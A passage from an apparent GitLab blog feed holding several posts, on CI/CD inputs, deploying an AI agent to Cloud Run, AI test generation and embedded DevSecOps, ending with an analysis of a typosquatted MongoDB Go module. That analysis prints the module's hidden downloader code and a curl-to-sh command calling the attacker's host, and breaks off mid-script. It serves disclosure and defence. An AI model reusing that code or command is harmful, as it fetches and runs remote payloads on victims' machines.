<p>By starting with new components and templates, then gradually migrating high-impact workflows, you'll quickly see the benefits of clearer contracts, earlier error detection, and more reliable automation that scales across your organization. Additionally, moving to inputs creates an excellent foundation for leveraging <a href="https://gitlab.com/explore/catalog">GitLab's CI/CD Catalog</a>, where reusable components with typed interfaces become powerful building blocks for your DevOps workflows. More on that in our next blog post.</p>
<p>Your future self and your teammates will thank you for the clarity and reliability that inputs bring to your CI/CD workflows, while still being able to work with the variable systems you've already invested in.</p>
<h2>What's next</h2>
<p>Looking ahead, we're expanding inputs to solve two key challenges: enhancing pipeline triggering with cascading options that <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/520094">dynamically adjust based on user selections</a>, and providing job-level inputs that allow users to <a href="https://gitlab.com/groups/gitlab-org/-/epics/17833">retry individual jobs with different parameter values</a>. We encourage you to follow these discussions, share your feedback, and contribute to shaping these features. You can also provide general feedback on CI/CD inputs through our <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/407556">feedback issue</a>.</p>
<h2>Read more</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/how-to-include-file-references-in-your-ci-cd-components/">How to include file references in your CI/CD components</a></li>
<li><a href="https://docs.gitlab.com/ci/inputs/">CI/CD inputs documentation</a></li>
<li><a href="https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/">CI/CD Catalog goes GA: No more building pipelines from scratch</a></li>
<li><a href="https://about.gitlab.com/blog/demystifying-ci-cd-variables/">GitLab environment variables demystified</a></li>
</ul>
]]></content>
        <author>
            <name>Dov Hershkovitch</name>
            <uri>https://about.gitlab.com/blog/authors/dov-hershkovitch</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Fast and secure AI agent deployment to Google Cloud with GitLab]]></title>
        <id>https://about.gitlab.com/blog/fast-and-secure-ai-agent-deployment-to-google-cloud-with-gitlab/</id>
        <link href="https://about.gitlab.com/blog/fast-and-secure-ai-agent-deployment-to-google-cloud-with-gitlab/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p><a href="https://about.gitlab.com/topics/agentic-ai/">Agentic AI</a> is transforming
how we build intelligent applications, but deploying AI agents securely and
efficiently can be challenging. In this tutorial, you'll learn how to deploy
an AI agent built with Google's Agent Development Kit
(<a href="https://cloud.google.com/vertex-ai/generative-ai/docs/agent-development-kit/quickstart">ADK</a>)
to Cloud Run using <a href="https://cloud.google.com/blog/topics/partners/understand-the-google-cloud-gitlab-integration">GitLab's native
integrations</a>
and <a href="https://docs.gitlab.com/ci/components/">CI/CD components</a>.</p>
<h2>What are AI agents and why do they matter?</h2>
<p>Agentic AI represents a significant evolution in artificial intelligence. Unlike traditional generative AI tools that require constant human direction, AI agents leverage advanced language models and natural language processing to take independent action. These systems can understand requests, make decisions, and execute multistep plans to achieve goals autonomously.</p>
<p>This tutorial uses Google's ADK, a flexible and modular framework for developing and deploying AI agents. While optimized for Gemini and the Google ecosystem, ADK is model-agnostic, deployment-agnostic, and built for compatibility with other frameworks.</p>
<h2>Our demo application: Canada City Advisor</h2>
<p>To demonstrate the deployment process, we'll work with a practical example: the Canada City Advisor. This AI agent helps users find their ideal Canadian city based on their preferences and constraints.</p>
<p>Here's how it works:</p>
<ul>
<li>
<p>Users input their budget requirements and lifestyle preferences.</p>
</li>
<li>
<p>The root agent coordinates two sub-agents:</p>
<ul>
<li>A budget analyzer agent that evaluates financial constraints. This draws data obtained from the Canada Mortgage and Housing Corporation.</li>
<li>A lifestyle preferences agent that matches cities to user needs. This includes a weather service that uses <a href="https://open-meteo.com/">Open-Meteo</a> to get the proper city information.</li>
</ul>
</li>
<li>
<p>The system generates personalized city recommendations</p>
</li>
</ul>
<p>This multi-agent architecture showcases the power of agentic AI: different specialized agents working together to solve a complex problem. The sub-agents are only invoked when the root agent determines that budget and lifestyle analysis are needed.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1751576568/obgxpxvlnxtzifddrrz1.png" alt="Multi-agent architecture to develop demo application with agentic AI"></p>
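<p>The delegation pattern, where a root agent invokes specialized sub-agents only when their analysis is needed, can be sketched in plain Python (ADK specifics omitted; the city data and class names below are purely illustrative):</p>
<pre><code class="language-python"># Illustrative sketch of root-agent/sub-agent delegation (not the ADK API).
MONTHLY_RENTS = {"Winnipeg": 1400, "Halifax": 1700, "Toronto": 2600}
LIFESTYLE_MATCHES = {"mild_winters": ["Victoria", "Halifax"],
                     "big_city": ["Toronto", "Montreal"]}

class BudgetAnalyzer:
    def analyze(self, budget):
        # Cities whose (made-up) monthly rent fits within the budget.
        return {city for city, rent in MONTHLY_RENTS.items() if rent in range(budget + 1)}

class LifestyleMatcher:
    def match(self, preference):
        return set(LIFESTYLE_MATCHES.get(preference, []))

class RootAgent:
    """Coordinates sub-agents, calling each one only when its input is present."""
    def __init__(self):
        self.budget_agent = BudgetAnalyzer()
        self.lifestyle_agent = LifestyleMatcher()

    def recommend(self, budget=None, preference=None):
        candidates = None
        if budget is not None:  # invoke the budget sub-agent only when needed
            candidates = self.budget_agent.analyze(budget)
        if preference is not None:  # likewise for the lifestyle sub-agent
            matched = self.lifestyle_agent.match(preference)
            candidates = matched if candidates is None else candidates.intersection(matched)
        return sorted(candidates or [])
</code></pre>
<p>The real ADK wires this coordination up declaratively; the point of the sketch is only that sub-agents run conditionally rather than on every request.</p>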
<h2>Prerequisites</h2>
<p>Before we begin, ensure you have:</p>
<ul>
<li>
<p>A Google Cloud project with the following APIs enabled:</p>
<ul>
<li>Cloud Run API</li>
<li>Artifact Registry API</li>
<li>Vertex AI API</li>
</ul>
</li>
<li>
<p>A GitLab project for your source code</p>
</li>
<li>
<p>Appropriate permissions in both GitLab and Google Cloud</p>
</li>
</ul>
<p><strong>Step 1: Set up IAM integration with Workload Identity Federation</strong></p>
<p>The first step establishes secure, keyless authentication between GitLab and Google Cloud using <a href="https://cloud.google.com/iam/docs/workload-identity-federation">Workload Identity Federation</a>. This eliminates the need for service account keys and improves security.</p>
<p>In your GitLab project:</p>
<ol>
<li>
<p>Navigate to <strong>Settings &gt; Integrations &gt; Google Cloud IAM.</strong></p>
</li>
<li>
<p>Provide the following information:</p>
<ul>
<li><strong>Project ID</strong>: Your Google Cloud project ID</li>
<li><strong>Project Number</strong>: Found in your Google Cloud console</li>
<li><strong>Pool ID</strong>: A unique identifier for your workload identity pool</li>
<li><strong>Provider ID</strong>: A unique identifier for your identity provider</li>
</ul>
</li>
</ol>
<p>GitLab will generate a script for you. Copy this script and run it in your Google Cloud Shell to create the Workload Identity Federation.</p>
<p><strong>Step 2: Configure Google Artifact Registry integration</strong></p>
<p>Next, we'll set up the connection to Google Artifact Registry where our container images will be stored.</p>
<ol>
<li>
<p>In GitLab, go to <strong>Settings &gt; Integrations &gt; Google Artifact Registry.</strong></p>
</li>
<li>
<p>Enter:</p>
<ul>
<li><strong>Google Cloud Project ID</strong>: Same as in Step 1</li>
<li><strong>Repository Name</strong>: Name of an existing Artifact Registry repository</li>
<li><strong>Location</strong>: The region where your repository is located</li>
</ul>
</li>
</ol>
<p><strong>Important</strong>: The repository must already exist in Artifact Registry. GitLab won't create a new one for you in this context.</p>
<p>GitLab will generate commands to set up the necessary permissions. Run these in Google Cloud Shell.</p>
<p>Additionally, add these roles to your service principal for Cloud Run deployment:</p>
<ul>
<li>
<p><code>roles/run.admin</code></p>
</li>
<li>
<p><code>roles/iam.serviceAccountUser</code></p>
</li>
<li>
<p><code>roles/cloudbuild.builds.editor</code></p>
</li>
</ul>
<p>You can add these roles using the following gcloud commands:</p>
<pre><code class="language-shell">GCP_PROJECT_ID=&quot;&lt;your-project-id&gt;&quot; #replace
GCP_PROJECT_NUMBER=&quot;&lt;your-project-number&gt;&quot; #replace
GCP_WORKLOAD_IDENTITY_POOL=&quot;&lt;your-pool-id&gt;&quot; #replace

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/run.admin'

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/iam.serviceAccountUser'

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/cloudbuild.builds.editor'
</code></pre>
<p><strong>Step 3: Create the CI/CD pipeline</strong></p>
<p>Now for the exciting part – let's build our deployment pipeline! GitLab's CI/CD components make this remarkably simple.</p>
<p>Create a <code>.gitlab-ci.yml</code> file in your project root:</p>
<pre><code class="language-yaml">stages:
  - build
  - test
  - upload
  - deploy

variables:
  GITLAB_IMAGE: $CI_REGISTRY_IMAGE/main:$CI_COMMIT_SHORT_SHA
  AR_IMAGE: $GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_LOCATION-docker.pkg.dev/$GOOGLE_ARTIFACT_REGISTRY_PROJECT_ID/$GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_NAME/main:$CI_COMMIT_SHORT_SHA

build:
  image: docker:24.0.5
  stage: build
  services:
    - docker:24.0.5-dind
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
  script:
    - docker build -t $GITLAB_IMAGE .
    - docker push $GITLAB_IMAGE

include:
  - template: Jobs/Dependency-Scanning.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Dependency-Scanning.gitlab-ci.yml
  - template: Jobs/SAST.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/SAST.gitlab-ci.yml
  - template: Jobs/Secret-Detection.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Secret-Detection.gitlab-ci.yml
  - component: gitlab.com/google-gitlab-components/artifact-registry/upload-artifact-registry@main
    inputs:
      stage: upload
      source: $GITLAB_IMAGE
      target: $AR_IMAGE
  - component: gitlab.com/google-gitlab-components/cloud-run/deploy-cloud-run@main
    inputs:
      stage: deploy
      project_id: &quot;&lt;your-project-id&gt;&quot; #replace
      service: &quot;canadian-city&quot;
      region: &quot;us-central1&quot;
      image: $AR_IMAGE
</code></pre>
<p>The pipeline consists of four stages:</p>
<ol>
<li>
<p><strong>Build</strong>: Creates the Docker container with your AI agent</p>
</li>
<li>
<p><strong>Test</strong>: Runs security scans (dependency scanning, SAST, secret detection)</p>
</li>
<li>
<p><strong>Upload</strong>: Pushes the container to Artifact Registry</p>
</li>
<li>
<p><strong>Deploy</strong>: Deploys to Cloud Run</p>
</li>
</ol>
<p>The great thing about using <a href="https://docs.gitlab.com/ci/components/">GitLab's CI/CD components</a> is that you only need to provide a few parameters: the components handle all the complex authentication and deployment logic.</p>
<p><strong>Step 4: Deploy and test</strong></p>
<p>With everything configured, it's time to deploy:</p>
<ol>
<li>
<p>Commit your code and <code>.gitlab-ci.yml</code> to your GitLab repository.</p>
</li>
<li>
<p>The pipeline will automatically trigger.</p>
</li>
<li>
<p>Monitor the pipeline progress in GitLab's CI/CD interface.</p>
</li>
<li>
<p>Once complete, find your Cloud Run URL in the Google Cloud Console.</p>
</li>
</ol>
<p>You'll see each stage execute:</p>
<ul>
<li>
<p>Build stage creates your container.</p>
</li>
<li>
<p>Test stage runs comprehensive security scans.</p>
</li>
<li>
<p>Upload stage pushes to Artifact Registry.</p>
</li>
<li>
<p>Deploy stage creates or updates your Cloud Run service.</p>
</li>
</ul>
<h2>Security benefits</h2>
<p>This approach provides several security advantages:</p>
<ul>
<li>
<p><strong>No long-lived credentials:</strong> Workload Identity Federation eliminates service account keys.</p>
</li>
<li>
<p><strong>Automated security scanning:</strong> Every deployment is scanned for vulnerabilities.</p>
</li>
<li>
<p><strong>Audit trail:</strong> Complete visibility of who deployed what and when.</p>
</li>
<li>
<p><strong>Principle of least privilege:</strong> Fine-grained IAM roles limit access.</p>
</li>
</ul>
<h2>Summary</h2>
<p>By combining GitLab's security features with Google Cloud's powerful AI and serverless platforms, you can deploy AI agents that are both secure and scalable. The integration between GitLab and Google Cloud eliminates much of the complexity traditionally associated with such deployments.</p>
<blockquote>
<p>Use this tutorial's <a href="https://gitlab.com/gitlab-partners-public/google-cloud/demos/ai-agent-deployment">complete code
example</a>
to get started now. Not a GitLab customer yet? Explore the DevSecOps platform with <a href="https://about.gitlab.com/free-trial/">a free trial</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Regnard Raquedan</name>
            <uri>https://about.gitlab.com/blog/authors/regnard-raquedan</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Enhance application quality with AI-powered test generation]]></title>
        <id>https://about.gitlab.com/blog/enhance-application-quality-with-ai-powered-test-generation/</id>
        <link href="https://about.gitlab.com/blog/enhance-application-quality-with-ai-powered-test-generation/"/>
        <updated>2025-07-03T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>You know how critical application quality is to your customers and reputation. However, ensuring that quality through comprehensive testing can feel like an uphill battle. You're dealing with time-consuming manual processes, inconsistent test coverage across your team, and those pesky issues that somehow slip through the cracks. It's frustrating when your rating drops because quality assurance becomes a bottleneck rather than a safeguard.</p>
<p>Here's where <a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q </a>, which delivers agentic AI throughout the software development lifecycle for AWS customers, can help transform your QA process. This AI-powered capability can automatically generate comprehensive unit tests for your code, dramatically accelerating your quality assurance workflow. Instead of spending hours writing tests manually, you can let AI analyze your code and create tests that ensure optimal coverage and consistent quality across your entire application.</p>
<h2>How GitLab Duo with Amazon Q works</h2>
<p>So how does this work? Let's walk through the process together.
When you're working on a new feature, you start by selecting the Java class you've added to your project through a merge request. You simply navigate to your merge request and click on the &quot;Changes&quot; tab to see the new code you've added.</p>
<p>Next, you invoke Amazon Q by entering a quick action command. All you need to do is type <code>/q test</code> in the merge request's comment box. It's that simple – just a forward slash, the letter &quot;q&quot;, and the word &quot;test&quot;.</p>
<p>Once you hit enter, Amazon Q springs into action. It analyzes your selected code, understanding its structure, logic, and purpose. The AI examines your class methods, dependencies, and potential edge cases to determine what tests are needed.</p>
<p>Within moments, Amazon Q generates comprehensive unit test coverage for your new class. It creates tests that cover not just the happy path, but also edge cases and error conditions you might have overlooked. The generated tests follow your project's existing patterns and conventions, ensuring they integrate seamlessly with your codebase.</p>
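<p>To make &quot;happy path, edge cases, and error conditions&quot; concrete, here is the shape of coverage a test generator aims for, shown for a small hypothetical function (Python for brevity; the scenario above uses a Java class):</p>
<pre><code class="language-python">import unittest

def parse_port(value):
    """Parse a TCP port from a string; raise ValueError when invalid."""
    port = int(value)  # raises ValueError for non-numeric input
    if port not in range(1, 65536):
        raise ValueError("port out of range: %d" % port)
    return port

class TestParsePort(unittest.TestCase):
    def test_happy_path(self):
        self.assertEqual(parse_port("8080"), 8080)

    def test_boundary_values(self):
        self.assertEqual(parse_port("1"), 1)          # lowest valid port
        self.assertEqual(parse_port("65535"), 65535)  # highest valid port

    def test_error_conditions(self):
        with self.assertRaises(ValueError):
            parse_port("0")           # below range
        with self.assertRaises(ValueError):
            parse_port("not-a-port")  # non-numeric
</code></pre>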
<h2>Why use GitLab Duo with Amazon Q?</h2>
<p>Here's the bottom line: You started with a critical challenge – maintaining high-quality applications while dealing with time constraints and inconsistent testing practices. GitLab Duo with Amazon Q addresses this by automating the test generation process, ensuring optimal code coverage and consistent testing standards. The result? Issues are detected before deployment, your applications maintain their quality, and you can develop software faster without sacrificing reliability.</p>
<p>Key benefits of this feature:</p>
<ul>
<li>Significantly reduces time spent writing unit tests</li>
<li>Ensures comprehensive test coverage across your codebase</li>
<li>Maintains consistent testing quality across all team members</li>
<li>Catches issues before they reach production</li>
<li>Accelerates your overall development velocity</li>
</ul>
<p>Ready to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can transform your quality assurance process:</p>
<figure class="video_container">
<iframe src="https://www.youtube.com/embed/pxlYJVcHY28?si=MhIz6lnHxc6kFhlL" frameborder="0" allowfullscreen="true"></iframe>
</figure>
<h2>Get started with GitLab Duo with Amazon Q today</h2>
<p>Want to learn more about GitLab Duo with Amazon Q? Visit the <a href="https://about.gitlab.com/partners/technology-partners/aws/">GitLab and AWS partner page</a> for detailed information.</p>
<h2>Agentic AI resources</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/agentic-ai-guides-and-resources/">Agentic AI guides and resources</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/blog/2025/04/17/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available</a></li>
<li><a href="https://docs.gitlab.com/user/duo_amazon_q/">GitLab Duo with Amazon Q documentation</a></li>
</ul>
]]></content>
        <author>
            <name>Cesar Saavedra</name>
            <uri>https://about.gitlab.com/blog/authors/cesar-saavedra</uri>
        </author>
        <published>2025-07-03T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Why now is the time for embedded DevSecOps]]></title>
        <id>https://about.gitlab.com/blog/why-now-is-the-time-for-embedded-devsecops/</id>
        <link href="https://about.gitlab.com/blog/why-now-is-the-time-for-embedded-devsecops/"/>
        <updated>2025-07-01T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>For embedded systems teams, DevSecOps has traditionally seemed like an approach better suited to SaaS applications than firmware development. But this is changing. Software is now a primary differentiator in hardware products. New market expectations demand modern development practices. In response, organizations are pursuing &quot;embedded DevSecOps.&quot;</p>
<p>What is embedded DevSecOps? The application of collaborative engineering practices, integrated toolchains, and automation for building, testing, and securing software to embedded systems development. Embedded DevSecOps includes necessary adaptations for hardware integration.</p>
<h2>Convergence of market forces</h2>
<p>Three powerful market forces are converging to compel embedded teams to modernize their development practices.</p>
<h3>1. The software-defined product revolution</h3>
<p>Products once defined primarily by their hardware are now differentiated by their software capabilities. The software-defined vehicle (SDV) market tells a compelling story in this regard. It's projected to grow from $213.5 billion in 2024 to <a href="https://www.marketsandmarkets.com/Market-Reports/software-defined-vehicles-market-187205966.html">$1.24 trillion</a> by 2030, a massive 34% compound annual growth rate.
The software content in these products is growing considerably. By the end of 2025, the average vehicle is expected to contain <a href="https://www.statista.com/statistics/1370978/automotive-software-average-lines-of-codes-per-vehicle-globally/">650 million lines of code</a>. Traditional embedded development approaches cannot handle this level of software complexity.</p>
<h3>2. Hardware virtualization as a technical enabler</h3>
<p>Hardware virtualization is a key technical enabler of embedded DevSecOps. Virtual electronic control units (vECUs), cloud-based ARM CPUs, and sophisticated simulation environments are becoming more prevalent. Virtual hardware allows testing that once required physical hardware.</p>
<p>These virtualization technologies provide a foundation for continuous integration (<a href="https://about.gitlab.com/topics/ci-cd/">CI</a>). But their value is fully realized only when integrated into an automated workflow. Combined with collaborative development practices and automated pipelines, virtual testing helps teams detect issues much earlier, when fixes are far less expensive. Without embedded DevSecOps practices and tooling to orchestrate these virtual resources, organizations can't capitalize on the virtualization trend.</p>
<h3>3. The competitive and economic reality</h3>
<p>Three interrelated forces are reshaping the competitive landscape for embedded development:</p>
<ul>
<li>The talent war has shifted decisively. As an embedded systems leader at a GitLab customer explained, “No embedded engineers graduating from college today know legacy tools like Perforce. They know Git. These young engineers will work at a company for six months on legacy tools, then quit.” Companies using outdated tools may lose their engineering future.</li>
<li>This talent advantage translates into competitive superiority. Tech-forward companies that attract top engineers with modern practices achieve remarkable results. For example, in 2024, <a href="https://spacenews.com/spacex-launch-surge-helps-set-new-global-launch-record-in-2024/">SpaceX</a> performed more orbital launches than the rest of the world combined. Tech-forward companies excel at software development and embrace a modern development culture. This, among other things, creates efficiencies that legacy companies struggle to match.</li>
<li>The rising costs of embedded development — driven by long feedback cycles — create an urgent need for embedded DevSecOps. When developers have to wait weeks to test code on hardware test benches, productivity remains inherently low. Engineers lose context while waiting and must rebuild it when results finally arrive. The problem worsens when defects enter the picture: bugs become more expensive to fix the later they're discovered, and long feedback cycles magnify this problem in embedded systems.</li>
</ul>
<p>Organizations are adopting embedded DevSecOps to help combat these challenges.</p>
<h2>Priority transformation areas</h2>
<p>Based on these market forces, forward-thinking embedded systems leaders are implementing embedded DevSecOps in the following ways.</p>
<h3>From hardware bottlenecks to continuous testing</h3>
<p>Hardware-testing bottlenecks represent one of the most significant constraints in traditional embedded development. These delays create the unfavorable economics described earlier — when developers wait weeks for hardware access, defect costs spiral.
Addressing this challenge requires a multifaceted approach including:</p>
<ul>
<li>Automating the orchestration of expensive shared hardware test benches among embedded developers</li>
<li>Integrating both SIL (Software-in-the-Loop) and HIL (Hardware-in-the-Loop) testing into automated CI pipelines</li>
<li>Standardizing builds with version-controlled environments</li>
</ul>
<p>Embedded developers can accomplish this with GitLab's <a href="https://gitlab.com/gitlab-accelerates-embedded/comp/device-cloud">On-Premises Device Cloud</a>, a CI/CD component. Through automating the orchestration of firmware tests on virtual and real hardware, teams are better positioned to reduce feedback cycles from weeks to hours. They also can catch more bugs early on in the software development lifecycle.</p>
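<p>As an illustrative sketch (job names and scripts are hypothetical, and the actual Device Cloud component defines its own inputs), such a pipeline typically runs inexpensive SIL simulation on every commit and gates access to scarce HIL benches behind it:</p>
<pre><code class="language-yaml">stages: [build, sil-test, hil-test]

build-firmware:
  stage: build
  script:
    - make firmware.bin
  artifacts:
    paths: [firmware.bin]

sil-test:
  stage: sil-test           # runs in simulation on every commit
  script:
    - ./run_sil_suite.sh firmware.bin

hil-test:
  stage: hil-test           # only reached when SIL tests pass
  tags: [hw-bench]          # routes the job to a runner attached to a physical test bench
  script:
    - ./flash_and_test.sh firmware.bin
</code></pre>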
<h3>Automating compliance and security governance</h3>
<p>Embedded systems face strict regulatory requirements. Manual compliance processes are unsustainable.
Leading organizations are transforming how they comply with these requirements by:</p>
<ul>
<li>Replacing manual workflows with automated <a href="https://about.gitlab.com/blog/introducing-custom-compliance-frameworks-in-gitlab/">compliance frameworks</a></li>
<li>Integrating specialized functional safety, security, and code quality tools into automated continuous integration pipelines</li>
<li>Automating approval workflows, enforcing code reviews, and maintaining audit trails</li>
<li>Configuring compliance frameworks for specific standards like ISO 26262 or DO-178C</li>
</ul>
<p>This approach enables greater compliance maturity without additional headcount — turning what was once a burden into a competitive advantage. One leading electric vehicle (EV) manufacturer executes 120,000 CI/CD jobs per day with GitLab, many of which include compliance checks. And they can develop and deploy bug fixes to vehicles within an hour of discovery. This level of scale and speed would be extremely difficult without automated compliance workflows.</p>
<h3>Enabling collaborative innovation</h3>
<p>Historically, for valid business and technical reasons, embedded developers have largely worked alone at their desks. Collaboration has been limited. Innovative organizations break down these barriers by enabling shared code visibility through integrated source control and CI/CD workflows. These modern practices attract and retain engineers while unlocking innovation that would remain hidden in isolated workflows.
As one director of DevOps at a tech-forward automotive manufacturer (a GitLab customer) explains: &quot;It's really critical for us to have a single pane of glass that we can look at and see the statuses. The developers, when they bring a merge request, are aware of the status of a given workflow in order to move as fast as possible.&quot; This transparency accelerates innovation, enabling automakers to rapidly iterate on software features that differentiate their vehicles in an increasingly competitive market.</p>
<h2>The window of opportunity</h2>
<p>Embedded systems leaders have a clear window of opportunity to gain a competitive advantage through DevSecOps adoption. But the window won't stay open forever. Software continues to become the primary differentiator in embedded products, and the gap between leaders and laggards will only widen.
Organizations that successfully adopt DevSecOps will reduce costs, accelerate time-to-market, and unlock innovation that differentiates them in the market. The embedded systems leaders of tomorrow are the ones embracing DevSecOps today.</p>
<blockquote>
<p>While this article explored why now is the critical time for embedded teams to adopt DevSecOps, you may be wondering about the practical steps to get started. Learn how to put these concepts into action with our guide: <a href="https://about.gitlab.com/blog/4-ways-to-accelerate-embedded-development-with-gitlab/">4 ways to accelerate embedded development with GitLab</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Matt DeLaney</name>
            <uri>https://about.gitlab.com/blog/authors/matt-delaney</uri>
        </author>
        <published>2025-07-01T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab catches MongoDB Go module supply chain attack]]></title>
        <id>https://about.gitlab.com/blog/gitlab-catches-mongodb-go-module-supply-chain-attack/</id>
        <link href="https://about.gitlab.com/blog/gitlab-catches-mongodb-go-module-supply-chain-attack/"/>
        <updated>2025-06-30T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Software supply chain attacks via malicious dependencies continue to be one of the most significant security threats to modern software development. The widespread use of open source components has enabled development teams to build applications rapidly, but it has also widened the attack surface area. The growing ecosystem of third-party packages presents numerous opportunities for attackers to exploit dependencies through techniques like typosquatting, dependency confusion, and package impersonation, making it increasingly challenging for developers to distinguish legitimate packages from malicious imposters.</p>
<p>To address this challenge, GitLab's Vulnerability Research team recently developed an automated detection system designed to proactively identify malicious dependencies in software supply chains. The system combines multiple detection techniques that work in concert:</p>
<ul>
<li>Automated typosquatting detection, which identifies suspicious naming patterns</li>
<li>Semantic code analysis, which flags potentially malicious behaviors like network requests or command executions</li>
<li>AI-assisted initial screening for advanced payload and obfuscation detection</li>
</ul>
<p>The Vulnerability Research team uses this multi-layered approach to continuously scan newly published dependencies across major ecosystems, providing early warning of supply chain attacks.</p>
<p>Using this detection system, GitLab recently identified a live typosquatting attack in the wild that leveraged a malicious MongoDB Go module. Below are details on the attack and how GitLab works to keep supply chains safe.</p>
<h2>Executive summary: A MongoDB module that's not quite right</h2>
<p>Our detection system flagged a newly published Go module called <code>github.com/qiniiu/qmgo</code>, closely mimicking the popular <a href="https://www.mongodb.com/">MongoDB</a> module <code>github.com/qiniu/qmgo</code>. The legitimate module describes itself as &quot;The Go driver for MongoDB&quot; and has gained traction in the Go community.</p>
<p>To disguise the malicious module as legitimate, the threat actor used a GitHub username nearly identical to the one associated with the real module with one subtle change: they added one “i” (<code>qiniu</code> → <code>qiniiu</code>). To the casual observer scrolling through search results or auto-complete suggestions, this difference would be very easy to overlook.</p>
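<p>To make the naming trick concrete, here is a minimal sketch of the kind of comparison a typosquat detector might run, assuming a plain Levenshtein edit-distance check. GitLab's actual heuristics are more involved and not fully public; the function names here are our own:</p>

```go
package main

import "fmt"

// editDistance returns the Levenshtein distance between a and b: the
// minimum number of single-character inserts, deletes, or substitutions
// needed to turn one into the other.
func editDistance(a, b string) int {
	prev := make([]int, len(b)+1)
	curr := make([]int, len(b)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(a); i++ {
		curr[0] = i
		for j := 1; j <= len(b); j++ {
			cost := 1
			if a[i-1] == b[j-1] {
				cost = 0
			}
			curr[j] = minInt(prev[j]+1, minInt(curr[j-1]+1, prev[j-1]+cost))
		}
		prev, curr = curr, prev
	}
	return prev[len(b)]
}

func minInt(x, y int) int {
	if x < y {
		return x
	}
	return y
}

// isSuspiciousName flags a newly seen account name that is within one
// edit of a well-known name without being identical to it.
func isSuspiciousName(candidate, known string) bool {
	d := editDistance(candidate, known)
	return d > 0 && d <= 1
}

func main() {
	fmt.Println(isSuspiciousName("qiniiu", "qiniu")) // true: one inserted "i"
	fmt.Println(isSuspiciousName("qiniu", "qiniu"))  // false: identical name
}
```

A real system would also weigh download counts, account age, and other signals before alerting, since a distance-one name alone is a weak indicator.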
<p>The new module’s code was a working copy of the legitimate <code>qmgo</code> module. However, malicious code was inserted into the <code>NewClient</code> function in <code>client.go</code>, a function that developers would naturally call when initializing their MongoDB connection. Concealing malicious code within a function made the payload less likely to be executed during potential runtime security analysis, while ensuring that it would execute from normal usage in real applications.</p>
<p>After we reported the malicious module, it was removed within approximately 19 hours. However, the threat actor quickly adapted, publishing a second typosquatted version (<code>github.com/qiiniu/qmgo</code>) just four days later with identical malicious code. This follow-up attack was also detected and taken down roughly one hour after initial discovery. The rapid redeployment demonstrates the persistent nature of these attacks and highlights why proactive detection is crucial in minimizing exposure windows.</p>
<h2>Technical deep dive: Peeling back the layers</h2>
<p>The threat actor took steps to hide the attack. The malicious payload used a multilayered approach, starting with a compact code snippet that triggered a chain of remote payload downloads:</p>
<pre><code class="language-go">txt, err := script.Get(&quot;https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html&quot;).String()  
if err == nil {  
    txt2, err := script.Get(string(strings.Replace(txt, &quot;\n&quot;, &quot;&quot;, -1))).String()  
    if err == nil {  
        exec.Command(&quot;/bin/sh&quot;, &quot;-c&quot;, string(txt2)).Start()  
    }  
}  
</code></pre>
<p>The attack unfolds in four distinct layers:</p>
<p><strong>Layer 1:</strong> The code fetches <code>update.html</code> from another repository owned by the typosquat account <code>qiiniu/vue-element-admin</code>. The file contained a single line:</p>
<pre><code>https://img.googlex.cloud/seed.php
</code></pre>
<p><strong>Layer 2:</strong> The code then fetches <code>https://img.googlex.cloud/seed.php</code>, which returns a single shell command that is then executed:</p>
<pre><code class="language-bash">curl -s http://207.148.110.29:80/logon61.gif|sh
</code></pre>
<p><strong>Layer 3:</strong> The command tells the system to fetch <code>http://207.148.110.29:80/logon61.gif</code> using curl and execute the response as a shell script. The shell script downloads what appears to be an MP3 file (<code>chainelli.mp3</code>) to <code>/tmp/vod</code>, makes it executable, runs it, and immediately deletes it:</p>
<pre><code class="language-bash">#!/bin/sh  
